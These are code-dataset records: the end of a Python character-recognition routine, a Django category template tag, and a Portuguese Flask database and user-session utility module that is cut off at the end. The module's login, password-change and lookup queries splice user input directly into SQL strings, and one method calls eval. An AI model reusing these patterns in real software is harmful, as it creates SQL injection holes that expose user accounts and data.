get_average(image)\n\timage_character = get_image_of_character(image,average)\n\timage_direct_resize = image_character.resize((resize_wh,resize_wh))\n\timage_filled = fill_image_to_resize_wh(zoom_image(image_character))\n\t#list[0] = row / col\n\tlist21 = []\n\tlist21.append(round((float(np.array(image_character).shape[0])/np.array(image_character).shape[1]),2))\n\t#list[1:11] = tranformation of row\n\tfor i in get_row_col_transformation(image_filled,average,False):\n\t\tlist21.append(i)\n\t#list[11:20] = tranformation of col\n\tfor i in get_row_col_transformation(image_filled,average,True):\n\t\tlist21.append(i)\n\t#ahash retrived from: https://www.cnblogs.com/luolizhi/p/5596171.html\n\t#hash_2=''.join(map(lambda i: '0' if idiff_transformation_total):\n\t\t\t\t\tdic_result[train_labels[indice]] = (row_col,diff_transformation_total,diff_hash)\n\t\n\tdic_sorted = sorted(dic_result.items(),key=lambda x:x[1][1])\n\t#print(dic_sorted)\n\t#return dic_sorted[0][0]\n\tif(len(dic_sorted) == 0):\n\t\treturn \"404\"\n\tif(len(dic_sorted) == 1):\n\t\treturn dic_sorted[0][0]\n\n\t#and (abs(dic_sorted[0][1][0] - dic_sorted[1][1][0]) < 0.1)\n\tif(dic_sorted[1][1][2] < dic_sorted[0][1][2] and (abs(dic_sorted[0][1][1]-dic_sorted[1][1][1])<10)):\n\t\treturn dic_sorted[1][0]\n\telse:\n\t\treturn dic_sorted[0][0]\n\n", "sub_path": "chinese_src/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 5435, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 112, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 154, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 154, "usage_type": "name"}]} +{"seq_id": "192419720", "text": "from django import template\nfrom django.template.loader import select_template\n\nfrom six import with_metaclass\n\nregister = template.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef render_category(context, category):\n\n if not category:\n # Search index is returning products that don't exist in the\n # database...\n return \"\"\n\n names = [\n \"catalogue/category_overview.html\",\n ]\n template_ = select_template(names)\n context = context.flatten()\n\n # Ensure the passed product is in the context as 'product'\n context[\"category\"] = category\n return template_.render(context)\n", "sub_path": "capetown/layout/themes/templatetags/category_page.py", "file_name": "category_page.py", "file_ext": "py", "file_size_in_byte": 628, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.template.Library", "line_number": 6, "usage_type": "call"}, {"api_name": "django.template", "line_number": 6, "usage_type": "name"}, {"api_name": "django.template.loader.select_template", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "288678498", "text": "# -*- coding: utf8 -*- #\n\n\"\"\"\n\nAutor: Marcos Felipe da Silva Jardim\n\n\"\"\"\nimport pymysql, pymssql, sys, json, re\nfrom pymongo import MongoClient\nimport re, time, os\nfrom flask import session\nfrom datetime import datetime\nfrom datetime import date\nimport config\nfrom PIL import Image, ExifTags\n\n## Classe que gera datas em formato formulario e banco mssql\nclass Data:\n __de = ''\n __ate = ''\n def __init__(self):\n self.__obterData()\n\n def __obterData(self):\n try:\n self.__de = session['de']\n self.__ate = session['ate']\n except KeyError:\n dataAtual = datetime.now()\n self.__de = '%04d-%02d-%02d' % (dataAtual.year, dataAtual.month, dataAtual.day)\n self.__ate = '%04d-%02d-%02d' % (dataAtual.year, dataAtual.month, dataAtual.day)\n\n def getDataForm(self):\n '''Obtem a data no formato tradicional'''\n return [self.__de, self.__ate]\n\n def getData(self):\n '''Obtem a data no formato de acesso ao banco de dados '''\n de = self.__de.replace('-','')\n ate = self.__ate.replace('-','')\n return [de, ate]\n\n def gravaData(self):\n ''' Grava a data atual em um cookie no formato das datas de formulario '''\n session['de'] = self.__de\n session['ate'] = self.__ate\n \n def setData(self, de, ate):\n ''' Grava as variaveis de data.'''\n padrao = re.compile('^[2][0][1-9][0-9]-([0][1-9]|[1][0-2])-([3][0-1]|[0][1-9]|[1-2][0-9])$')\n if padrao.match(de) and padrao.match(ate):\n self.__de = de\n self.__ate = ate\n else:\n return 'Data informada de forma incorreta'\n \n ## Funcao que verifica a data\n @staticmethod\n def verifica_data(de, ate):\n padrao = re.compile('^[2][0][1-9][0-9]-([0][1-9]|[1][0-2])-([3][0-1]|[0][1-9]|[1-2][0-9])$')\n if padrao.match(de) and padrao.match(ate):\n return True\n else:\n return False\n\n## Classe usada para trabalhar com consultas do tipo select. Contem muitos metodos uteis como ordenacao de colunas e filtros de campos\nclass Consulta:\n __campos = ''\n __registros = ''\n\n \n def __init__(self, consulta, usuario, senha, banco, servidor, tipo_sgbd='mysql', porta = 1433):\n \"\"\"Retorna um objeto consulta sendo os parametros consulta, usuario , senha, banco, servidor devem ser repassados no momento de criação do objeto. O único parâmetro opcional é o tipo de sgbd que vem como padrão mysql\n\t EX: obj = Consulta('select * from teste', 'root', 'marcos', 'banco_teste', 'localhost', 'mysql')\n \"\"\"\n \n self.__consulta = consulta\n self.__usuario = usuario\n self.__senha = senha\n self.__banco = banco\n self.__servidor = servidor\n self.__tipo_sgbd = tipo_sgbd\n self.__porta = porta\n\t\n self.__conexao()\n\n def __str__(self):\n return 'Consulta(\"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\")' % \\\n (self.__consulta, self.__usuario, self.__senha, self.__banco, self.__servidor, self.__tipo_sgbd)\n\n def __repr__(self):\n return eval('Consulta(\"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\")' %\n (self.__consulta, self.__usuario, self.__senha, self.__banco, self.__servidor, self.__tipo_sgbd))\n\n def getCampos(self):\n \"\"\" Retorna todos os campos da tabela \"\"\"\n return self.__campos\n\n def getRegistros(self):\n \"\"\" Retorna todos os registros da consulta \"\"\"\n return self.__registros\n\n def setConsulta(self, consulta):\n \"\"\"\n self.setConsulta('select * from adm_menu')\n \n Executa uma nova consulta no banco e redefine as variaveis de instancia __registros e __campos.\\\n Este metodo foi criado com o intuito de permitir a mudança de dados sem de fato ter de criar outro\n objeto consulta.\n OBS: Somente aceita querys de selecao (select)\n \"\"\"\n\n self.__consulta = consulta\n self.__conexao()\n \n def __conexao(self):\n \"\"\" Realiza de fato a conexão, usando os parametros passados para a conexão \"\"\"\n if self.__tipo_sgbd == 'mysql':\n con = pymysql.connect(user = self.__usuario, password = self.__senha, database = self.__banco, host = self.__servidor, port = self.__porta)\n elif self.__tipo_sgbd == 'mssql':\n con = pymssql.connect(user = self.__usuario, password = self.__senha, database = self.__banco, host = self.__servidor, port = self.__porta)\n else:\n return 'Erro, tipo de SGBD não reconhecido'\n\n # Executar a conexão e a consulta\n cur = con.cursor()\n cur.execute(self.__consulta)\n # Preenchendo os cabecalhos\n self.__campos = [str(campo) for campo, *_ in cur.description]\n # Preenchendo o corpo\n self.__registros = [reg for reg in cur.fetchall()]\n \n # Fechando a conexão com o banco\n con.commit()\n cur.close()\n con.close()\n\n def selecionaCampo(self, nome):\n \"\"\"\n self.selecionaCampo('nome') ou self.selecionaCampo(0) => list()\n \n Seleciona um campo baseado no nome que é informado ou no seu numero de coluna. \\\n O nome de fato deve ser real ao nome do campo informado pelo retornno de self.getCampos() \"\"\"\n if nome in self.__campos:\n index = self.__campos.index(nome)\n return [str(item[index]) for item in self.__registros]\n # Se nome for um numero então ele será comparado para verificação de indice de coluna\n elif isinstance(nome, int):\n if nome <= (len(self.__campos)-1):\n index = nome\n return [str(item[index]) for item in self.__registros]\n else:\n return 'O indice de coluna informado não é acessivel na consulta, verifique os campos no atributo _campos ou use um nome de coluna'\n else:\n return 'A coluna informada não foi encontrada, favor verificar o atributo _campos'\n\n def selecionaCampos(self, lista):\n \"\"\"self.selecionaCampos(['nome','senha']) => list()\n Seleciona um ou mais campos informados pelo seu nome. Os nomes devem ser enviados \\\n dentro de uma lista. Se não sabe quais colunas deseja capturar verifique o metodo getCampos().\n Os campos são retornados como uma tupla aninhada dentro de uma lista externa. \"\"\"\n if isinstance(lista, list):\n # Cria um objeto conjunto para unificar os campos\n conjunto = list()\n for item in lista:\n if isinstance(item, str) and item in self.__campos:\n conjunto.append(self.__campos.index(item))\n else:\n return 'Favor enviar somente nomes de colunas que existam em self.__campos'\n\n reg = []\n for item in self.__registros:\n listas = []\n for campo in conjunto:\n listas.append(item[campo])\n reg.append(tuple(listas))\n return reg\n else:\n return 'Por favor informe uma lista para os campos que se deseja retornar'\n \n def ordenaColuna(self, coluna, decrescente=True):\n \"\"\"Ordena a coluna informada na ordem desejada(ordena os registros) e devolve uma copia para o\n usuario. A coluna deve existir em __campos (verificar com o metodo getCampos()).\n self.ordenaColuna('id_usuarios', False)\n \"\"\"\n # Se a coluna não existe em self.__campos nem continuo\n if coluna not in self.__campos:\n return 'Campo nao existe'\n \n # Salva os valores originais em variaveis usadas para devolver tudo ao estado original\n campo_original = self.__campos[:]\n registro_original = self.__registros[:]\n # Faz uma copia para uma lista onde vai estar os campos alterados. Na verdade ela é somente temporaria\n campo_alterado = self.__campos[:]\n # Remove o campo a ser ordenado da lista copiada. Isto para trazer ele em um novo array como primeiro campo \n campos_ordenados = [campo_alterado.pop(self.__campos.index(coluna))]\n desc = [ campos_ordenados.append(item) for item in campo_alterado ]\n # Exclui a variavel temporaria desc e campo_alterado (reducao de consumo de memoria)\n del desc\n del campo_alterado\n ## Recupera os registros desejados com a coluna a ser ordenada em primeiro lugar\n registros_ordenados = self.selecionaCampos(campos_ordenados)\n ## Ordena de fato os registros baseado no valor de decrescente, True ou false\n registros_ordenados = sorted(registros_ordenados, reverse=decrescente)\n\n ## Insere a ordem dos novos registros em self.__registros e self.__campos armazena a ordem dos campos\n # Isto é importante porque vamos devolver os campos originais ao usuario, ou seja as colunas originais na ordem da coluna\n # informada.\n self.__registros = registros_ordenados\n self.__campos = campos_ordenados\n ## Pede para receber o retorno da ordem das colunas originais com os registros ordenados da forma desejada antes.\n \n registros_ordenados = self.selecionaCampos(campo_original)\n # Volta os valores __campos e __registros para o original\n self.__campos = campo_original\n self.__registros = registro_original\n # Devolve os registros em ordem de coluna original com a coluna desejada ditando a ordem principal\n return registros_ordenados\n\n def procuraDados(self, dado):\n \"\"\" Retorna True se o dado a ser procurado existe em self.getRegistros(), caso contrario retorna False\"\"\"\n for reg in self.getRegistros():\n for item in reg:\n if dado == item:\n return True\n return False\n\n def __len__(self):\n return len(self.getRegistros())\n \n @staticmethod\n def executarConsulta(consulta, usuario, senha, banco, servidor, tipo_sgbd='mysql', porta = 1433):\n \n ''' Realiza de fato a conexão, usando os parametros passados para a conexão '''\n if tipo_sgbd == 'mysql':\n con = pymysql.connect(user = usuario, password = senha, database = banco, host = servidor)\n elif tipo_sgbd == 'mssql':\n con = pymssql.connect(user = usuario, password = senha, database = banco, host = servidor, port = porta)\n else:\n return 'Erro, tipo de SGBD não reconhecido'\n # Executar a conexão e a consulta\n cur = con.cursor()\n cur.execute(consulta)\n con.commit()\n cur.close()\n con.close()\n @staticmethod\n def obter_db_mongo(banco = None):\n ''' Retorna o banco de daddos do mongodb informado pelos parametros de acesso em config.py'''\n c = MongoClient('mongodb://%s:%s@%s' % (config.mongo_acesso['usuario'], \n config.mongo_acesso['senha'], \n config.mongo_acesso['servidor']))\n return c[config.mongo_acesso['banco'] if banco is None else banco]\n\n \n## CLASSE DO USUARIO. ARMAZENA COOKIES, RETORNA-OS, EXIBE SEU NOME, RETORNA ACESSOS ETC...\nclass Usuario(Consulta, Data):\n __id = 0\n __nome = ''\n __email = ''\n __menus = list()\n\t\n def __init__(self, usuario = '', senha = '', chave = None):\n ''' Retorna um objeto usuario recebendo como parametro inicial o ID do usuario '''\n self.__dadosUsuario(usuario, senha, chave)\n Data.__init__(self) \n \n def getLojas(self, com_id = False):\n ''' Retorna todas as lojas que o usuario tem acesso. '''\n if com_id == True:\n sql = \"\"\"select af.id_filial, af.filial from adm_filial af \n INNER JOIN adm_usuario_filial auf ON af.id_filial = auf.id_filial \n INNER JOIN adm_usuario au ON au.id_usuario = auf.id_usuario \n WHERE auf.id_usuario = %d\"\"\" % self.getID()\n else:\n sql = \"\"\"select af.filial from adm_filial af \n INNER JOIN adm_usuario_filial auf ON af.id_filial = auf.id_filial \n INNER JOIN adm_usuario au ON au.id_usuario = auf.id_usuario \n WHERE auf.id_usuario = %d\"\"\" % self.getID()\n con = pymysql.connect(user = my_usuario, password = my_senha, database = my_banco, host = my_servidor)\n cur = con.cursor()\n cur.execute(sql)\n if com_id == True:\n lojas = [ loja for loja in cur.fetchall()]\n else:\n lojas = [ ('%s') % loja for loja in cur.fetchall()]\n cur.close()\n con.close()\n return lojas\n\n def getGrupos(self, com_id = False):\n '''Retorna todos os grupos que o usuario tem acesso. Os grupos são retornados em uma matriz '''\n if com_id == True:\n sql = \"\"\"select ag.id_grupo, ag.grupo from adm_grupo ag \n INNER JOIN adm_usuario_grupo aug ON ag.id_grupo = aug.id_grupo \n INNER JOIN adm_usuario au ON au.id_usuario = aug.id_usuario \n WHERE aug.id_usuario = %d \"\"\" % self.getID()\n else:\n sql = \"\"\"select ag.grupo from adm_grupo ag \n INNER JOIN adm_usuario_grupo aug ON ag.id_grupo = aug.id_grupo \n INNER JOIN adm_usuario au ON au.id_usuario = aug.id_usuario \n WHERE aug.id_usuario = %d \"\"\" % self.getID()\n con = pymysql.connect(user = my_usuario, password = my_senha, database = my_banco, host = my_servidor)\n cur = con.cursor()\n cur.execute(sql)\n if com_id == True:\n grupos = [ grupo for grupo in cur.fetchall()]\n else:\n grupos = [ ('%s') % grupo for grupo in cur.fetchall()]\n cur.close()\n con.close()\n\t \n return grupos\n\n @staticmethod\n def getTodosGrupos(com_id = False):\n '''Retorna todos os grupos do sistema '''\n if com_id == True:\n sql = \"\"\"select ag.id_grupo, ag.grupo from adm_grupo ag \"\"\"\n else:\n sql = \"\"\"select ag.grupo from adm_grupo ag \"\"\"\n con = pymysql.connect(user = my_usuario, password = my_senha, database = my_banco, host = my_servidor)\n cur = con.cursor()\n cur.execute(sql)\n if com_id == True:\n grupos = [ grupo for grupo in cur.fetchall()]\n else:\n grupos = [ ('%s') % grupo for grupo in cur.fetchall()]\n cur.close()\n con.close()\n\t \n return grupos\n\n\n def getID(self):\n \"\"\" Retorna o ID do usuario.\"\"\"\n return self.__id\n \n def getNome(self):\n \"\"\" Retorna o nome do usuario.\"\"\"\n return self.__nome\n\n def getMenuAdm(self):\n \"\"\" Retorna um dicionario com os menus já agrupados\"\"\"\n dados = {}\n for reg in self.__menus:\n chave, valor, nome = reg\n if chave in sorted(dados.keys()):\n dados[chave].append(valor)\n else:\n dados[chave] = [valor]\n return dados\n \n def __dadosUsuario(self, usuario, senha, chave = None):\n \"\"\" Verifica se usuario e senha estao em branco, então ver se tem cookies. Se tiver preencher variaveis. \"\"\"\n sqlMenu = \"\"\"SELECT am.familia, am.link, am.nome FROM adm_usuario au INNER JOIN adm_usuario_menu aum \n ON au.id_usuario = aum.id_usuario INNER JOIN adm_menu am ON aum.id_menu = am.id_menu \n WHERE aum.id_usuario = %d ORDER BY am.familia, am.nome\"\"\"\n \n if usuario == '' and senha == '' and chave is None :\n try:\n self.__id = int(session['id'])\n self.__nome = session['nome']\n self.__email = session['email']\n except KeyError:\n self.__id = 0\n sql = 'select * from adm_usuario where id_usuario = %d' % self.__id\n Consulta.__init__(self, sql, my_usuario, my_senha, my_banco, my_servidor, 'mysql', porta = my_porta)\n\n elif not chave is None:\n \n # TENTA FAZER O LOGIN BASEADO NA CHAVE ENVIADA\n SQL = \"SELECT id_usuario, nome, email FROM adm_usuario WHERE uid = '%s' \" % chave\n # Executando e criando um objeto consulta\n Consulta.__init__(self, SQL, my_usuario, my_senha, my_banco, my_servidor, 'mysql', porta = my_porta)\n \n dados = self.getRegistros()\n for reg in dados:\n self.__id, self.__nome, self.__email = reg\n\n else:\n # Consulta para verificar se usuario e senha estão corretos e seus menus\n sql = \"SELECT id_usuario, nome, email FROM adm_usuario WHERE nome = '%s' AND senha = SHA('%s')\" % (usuario, senha)\n \n # Executando e criando um objeto consulta\n Consulta.__init__(self, sql, my_usuario, my_senha, my_banco, my_servidor, 'mysql', porta = my_porta)\n \n dados = self.getRegistros()\n for reg in dados:\n self.__id, self.__nome, self.__email = reg\n # Executando e criando um objeto consulta\n\t\t\n self.setConsulta(sqlMenu % self.__id)\n\n self.__menus = self.getRegistros()\n \n def atualizaSenha(self, senhaAntiga, novaSenha):\n \"\"\" Recebe a senha antiga e a senha nova do usuario, baseado nisto tenta alterar a senha conectando com e atualizando a nova.\"\"\"\n # Consulta para verificar a senha antiga\n sqlSenha = \"SELECT senha FROM adm_usuario WHERE id_usuario = %d AND senha = SHA('%s') \" % (self.__id, senhaAntiga)\n self.setConsulta(sqlSenha)\n\n dados = self.getRegistros()\n if len(dados) == 1:\n # Senha correta, vamos atualiza-la\n sqlAtualizaSenha = \"UPDATE adm_usuario SET senha = SHA('%s') WHERE id_usuario = %d\" % (novaSenha, self.__id)\n Consulta.executarConsulta(sqlAtualizaSenha, my_usuario, my_senha, my_banco, my_servidor, porta = my_porta)\n return 'Senha Atualizada'\n else:\n return 'Erro com a senha enviada. Senha incorreta'\n\n def gravaGrupos(self, grupos):\n ''' Grava os grupos em um cookie para ser usado nas proximas consultas.'''\n session['grupo_selecionado'] = grupos\n\n def gravaTipos(self, tipos):\n ''' Grava os tipos AR e/ou OC escolhidos na validacao dos relatorios por grife e referencia '''\n session['tipo_ar_oc'] = tipos\n \n def gravaGrupoTemporario(self, grupos):\n ''' Grava os grupos temporarios usados nos relatorios de grife e referencia '''\n session['grupo_temporario'] = grupos\n \n def gravaLojas(self, lojas):\n ''' Grava as lojas que foram enviadas na consulta'''\n session['loja_selecionada'] = lojas\n \n def gravaVisita(self, tabela):\n ''' Grava a visita do usuario na tabela da pagina, assim como a data/hora(Implementada via MySQL)'''\n SQL = \"INSERT INTO analise_acesso VALUES(0, '%s', '%s', NOW())\" % (self.getNome(), tabela)\n Consulta.executarConsulta(SQL, my_usuario, my_senha, my_banco, my_servidor, 'mysql', porta = my_porta)\n\n def verificaMenu(self, menu):\n ''' Verifica o menu do usuario se o mesmo tiver este menu retorna True senao retorna False'''\n for _, m, n in self.__menus:\n\n if m.find(menu) != -1:\n return True\n else:\n continue\n return False\n\n def gravaTipoGrupoGrife(self, grupo_grife):\n ''' Grava os tipos grupo grife (AHIC, TCHA) '''\n session['tipo_grupo_grife'] = grupo_grife\n\n def getDivulgadorGrupo(self, id_grupo, id_filial):\n ''' Retorna o ID e nome do divulgador dependendo do id_grupo e id_filial repassado'''\n SQL = \"SELECT d.id_divulgador, d.nome FROM divulgador d INNER JOIN adm_grupo_filial_divulgador agfd ON agfd.id_divulgador = d.id_divulgador \\\n INNER JOIN adm_grupo ag ON ag.id_grupo = agfd.id_grupo INNER JOIN adm_filial af ON af.id_filial = agfd.id_filial \\\n WHERE agfd.id_grupo = %d AND agfd.id_filial = %d AND d.D_E_L_E_T_ IS NULL\" % (int(id_grupo), int(id_filial))\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, 'mysql', porta = my_porta)\n return c.getRegistros()\n\n def getDivulgador(self):\n '''Retorna todos os divulgadores cadastrados no sistema até o momento '''\n SQL = \"SELECT id_divulgador, nome FROM divulgador WHERE D_E_L_E_T_ IS NULL \"\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, 'mysql', porta = my_porta)\n return c.getRegistros()\n \n def getQuantidadeVendedores(self, grupo, mes, ano):\n ''' Este metodo do usuario recupera a quantidade de vendeores na loja retornando um\n dicionario com a quantidade de vendedores'''\n meta = {'01':['JAN'],'02':['FEV'],'03':['MAR'],'04':['ABR'],'05':['MAI'],\n '06':['JUN'],'07':['JUL'],'08':['AGO'],'09':['SET'],\n '10':['OUT'],'11':['NOVE'],'12':['DEZE']}\n SQL = \"\"\"SELECT gf.nome AS LOJA, mi.qt_vendedor AS VENDEDOR FROM adm_grupo_fil gf \n INNER JOIN adm_grupo_fil_ano_mes_meta_info gfammi ON gf.id_grupo_fil = gfammi.id_grupo_fil\n INNER JOIN adm_ano a ON a.id_ano = gfammi.id_ano \n INNER JOIN adm_mes m ON m.id_mes = gfammi.id_mes\n INNER JOIN adm_meta_info mi ON mi.id_meta_info = gfammi.id_meta_info \n WHERE gf.nome IN(%s) AND m.mes = '%s' AND a.ano = '%s' \n GROUP BY gf.nome, mi.qt_vendedor \"\"\" % (grupo, meta[mes][0], ano)\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, 'mysql', porta = my_porta)\n return {reg[0]:reg[1] for reg in c.getRegistros()}\n\n def registraVisita(self, menu):\n ''' Recebe uma string representando o menu e então computa a visita do usuario '''\n SQL = \"SELECT id_menu FROM adm_menu where link LIKE '%\"+menu+\"%'\"\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n qt_acesso = c.getRegistros()[0][0]\n SQL = \"\"\"INSERT INTO adm_usuario_menu_num_acesso (id_usuario, id_menu, num_acesso) \n SELECT %d, %d, 0 FROM DUAL WHERE NOT EXISTS \n (SELECT id_usuario, id_menu, num_acesso FROM adm_usuario_menu_num_acesso \n WHERE id_usuario = %d AND id_menu = %d )\"\"\" % (self.getID(), qt_acesso, self.getID(), qt_acesso)\n Consulta.executarConsulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n ## Ultima query para fazer o update do campo num_acesso\n SQL = \"UPDATE adm_usuario_menu_num_acesso SET num_acesso = num_acesso + 1 WHERE id_usuario = %d AND id_menu = %d \" % (self.getID(), qt_acesso)\n Consulta.executarConsulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n ## QUERY PARA REGISTRAR DATA/HORA DE ACESSO\n SQL = \"INSERT INTO adm_usuario_menu_data_acesso (id_usuario, id_menu) VALUES(%d, %d)\" % (self.getID(), qt_acesso)\n Consulta.executarConsulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n\n def retornaMenuUsuario(self):\n ''' Retorna o primeiro menu do usuario para que do lado do controlador ele seja redirecionado'''\n menu_interno = self.__menus[0][1]\n inicio = menu_interno.find('href=') + len('href=') + 1\n fim = menu_interno[inicio:].find('>') - 1\n m = menu_interno[inicio:inicio+fim]\n return m\n\n def getGrupoFilial(self):\n ''' Retorna o grupo e filial selecionado '''\n grupo_filial = [\"'%02d%02d'\" % (int(num), int(lj)) for num in str(session['grupo_selecionado']).split(',')\n for lj in str(session['loja_selecionada']).split(',')]\n return ','.join(grupo_filial)\n \n def getGrupoSelecionado(self, nome = False):\n ''' Retorna uma lista do grupo selecionado '''\n if nome:\n numeros = [str(num) for num in str(session['grupo_selecionado']).split(',')]\n grpID = ','.join(numeros)\n SQL = \"SELECT id_grupo, nome FROM adm_grupo WHERE id_grupo IN(%s)\" % (grpID)\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n return {idGrupo:nome.split('-')[1].strip() for idGrupo, nome in c.getRegistros()}\n else:\n return [int(num) for num in str(session['grupo_selecionado']).split(',')]\n\n def getFilialSelecionado(self):\n '''Retorna a filial selecionada '''\n return str(session['loja_selecionada']).split(',')\n\n def getTipoArOc(self):\n ''' Retorna o tipo ar/oc ou ambos selecionado'''\n return [ tipo for tipo in str(session['tipo_ar_oc']).split(',')]\n\n def getGrife(self):\n ''' Retorna a grife selecionada '''\n return [ grife for grife in str(session['tipo_grupo_grife']).split(',') ]\n\n def getGruposTodos(self):\n ''' Retorna todos os grupos do sistema '''\n SQL = \"SELECT id_grupo, grupo FROM adm_grupo\"\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n return {idGrupo:nome for idGrupo, nome in c.getRegistros()}\n\n def getGrupoTemporarioSelecionado(self, nome = False):\n ''' Retorna todos os grupos temporarios '''\n if nome:\n numeros = [str(num) for num in str(session['grupo_temporario']).split(',')]\n grpID = ','.join(numeros)\n SQL = \"SELECT id_grupo, nome FROM adm_grupo WHERE id_grupo IN(%s)\" % (grpID)\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n return {idGrupo:nome.split('-')[1].strip() for idGrupo, nome in c.getRegistros()}\n else:\n return [int(num) for num in str(session['grupo_temporario']).split(',')]\n\n def getGrupoFilialTemporario(self):\n ''' Retorna o grupo e filial selecionado '''\n grupo_filial = [\"'%02d%02d'\" % (int(num), int(lj)) for num in str(session['grupo_temporario']).split(',')\n for lj in range(1,3)]\n return ','.join(grupo_filial)\n \n def getLentesPontuacao(self, novos_pontos = False):\n '''Recupera todas as lentes que fazem parte da campanha de pontuacao e as retorna como um dicionario '''\n if novos_pontos == True:\n SQL = \"\"\" SELECT codigo, novos_pontos FROM adm_lentes_campanha ORDER BY pontos DESC \"\"\"\n else:\n SQL = \"\"\" SELECT codigo, pontos FROM adm_lentes_campanha ORDER BY pontos DESC \"\"\"\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n return {cod:pt for cod,pt in c.getRegistros()}\n \n def getLentesPontuacaoLoja(self, loja, de, ate, novos_pontos = False):\n ''' Recupera os pontos de cada vendedor baseado nas lentes que ele vendeu '''\n pontos = self.getLentesPontuacao(novos_pontos)\n cod = [\"'%s'\" % key for key in pontos.keys()]\n SQL = querys.SQL_PONTUACAO_LENTES_CAMPANHA % (querys.caso_meta_vendedor, \n de, ate, ','.join(cod), self.getGrupoFilial())\n c = Consulta(SQL, ms_usuario, ms_senha, ms_banco, ms_servidor, tipo_sgbd='mssql', porta=ms_porta)\n pt_vends = {}\n for reg in c.getRegistros():\n if reg[1] == '' or reg[1] is None:\n continue\n else:\n if not reg[0] in pt_vends.keys():\n pt_vends[reg[0]] = [reg[2], 0, 0]\n ## Somar a quantidade de lentes e os pontos obtidos\n pt_vends[reg[0]][1] += reg[4]\n pt_vends[reg[0]][2] += pontos[reg[3]] * reg[4]\n ## Retorna o pt_vends {cpf:[nome, qt_lentes, qt_pts]}\n return pt_vends\n\n ## Obtem o grupo_fil como o sistema p12 entende\n @staticmethod\n def get_grupo_fil(grupo, fil):\n ''' Recebe o grupo e a filial e os retorna '''\n # Os dois sao uma lista, vamos retornar o grupo_fil\n try:\n return ['%02d%02d' % (int(gr), int(fl)) for gr in grupo.split(',') \n for fl in fil.split(',')]\n except ValueError:\n return False\n\n ## Obtendo um dicionario dos nomes dos grupos selecionados\n @staticmethod\n def get_grupo_selecionado(grupo, nome = False):\n ''' Retorna uma lista do grupo selecionado '''\n if nome:\n numeros = [str(num) for num in grupo.split(',')]\n grpID = ','.join(numeros)\n SQL = \"SELECT id_grupo, nome FROM adm_grupo WHERE id_grupo IN(%s)\" % (grpID)\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n return {idGrupo:nome.split('-')[1].strip() for idGrupo, nome in c.getRegistros()}\n else:\n return [int(num) for num in grupo.split(',')]\n ## Obtendo os menus do usuario baseado no id\n @staticmethod\n def get_menu(ID):\n ''' Retorna os menus do usuario baseado no id dele'''\n sql = \"\"\"SELECT am.familia, am.link, am.nome FROM adm_usuario au INNER JOIN adm_usuario_menu aum \n ON au.id_usuario = aum.id_usuario INNER JOIN adm_menu am ON aum.id_menu = am.id_menu \n WHERE aum.id_usuario = %d ORDER BY am.familia, am.nome \"\"\" % int(ID)\n c = Consulta(sql, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n menu = {}\n for reg in c.getRegistros():\n if not reg[0] in menu.keys():\n menu[reg[0]] = []\n # RETIRAR A TAG a e trazer somente o href\n link = reg[1]\n inicio = link.find('href=') + len('href=') + 1\n fim = link[inicio:].find('>') - 1\n link = link[inicio:inicio+fim]\n \n menu[reg[0]].append([ link, reg[2] ])\n return menu\n \n def getEmail(self):\n return self.__email\n\n# Classe para utilitarios\nclass Utils:\n\n # Funcao que recupera o hash para uso da api do site\n @staticmethod\n def get_chave_api():\n ''' Esta funcao recupera a chave da api '''\n SQL = \"SELECT chave_api FROM adm_chave_api WHERE id_chave_api = 1\"\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n return c.getRegistros()[0][0]\n\n ## Converter dinheiro\n @staticmethod\n def converter(valor):\n ## verificar se existe dois numeros apos o ponto\n valor = str(valor)\n verificar = len(valor[(valor.find('.')+1):])\n if verificar == 2:\n pass\n else:\n valor = valor+'0'\n # Substituir o ponto por virgula\n valor = valor.replace('.',',')\n\n # contador, a cada 3 x inserir um ponto\n x = 0 \n # a string que recebera cada caractere convertido\n d = ''\n # Pega o valor e reverte sua ordem\n rever = valor[::-1]\n # Caminha sobre cada caractere da string\n for i in rever:\n # Se o x for inferior a 4 entao vamos incrementar x e colocar o caractere\n if x < 4:\n x += 1\n d += i\n # X nao tem resto na divisao por tres, entao incluiremos o ponto e incrementamos x\n elif x % 3 == 0:\n d += '.' + i \n x += 1\n # X já e maior que 4 e nao e divisivel por 3, entao vamos incrementar x e adicionar o caractere a d\n else:\n d += i\n x += 1\n # 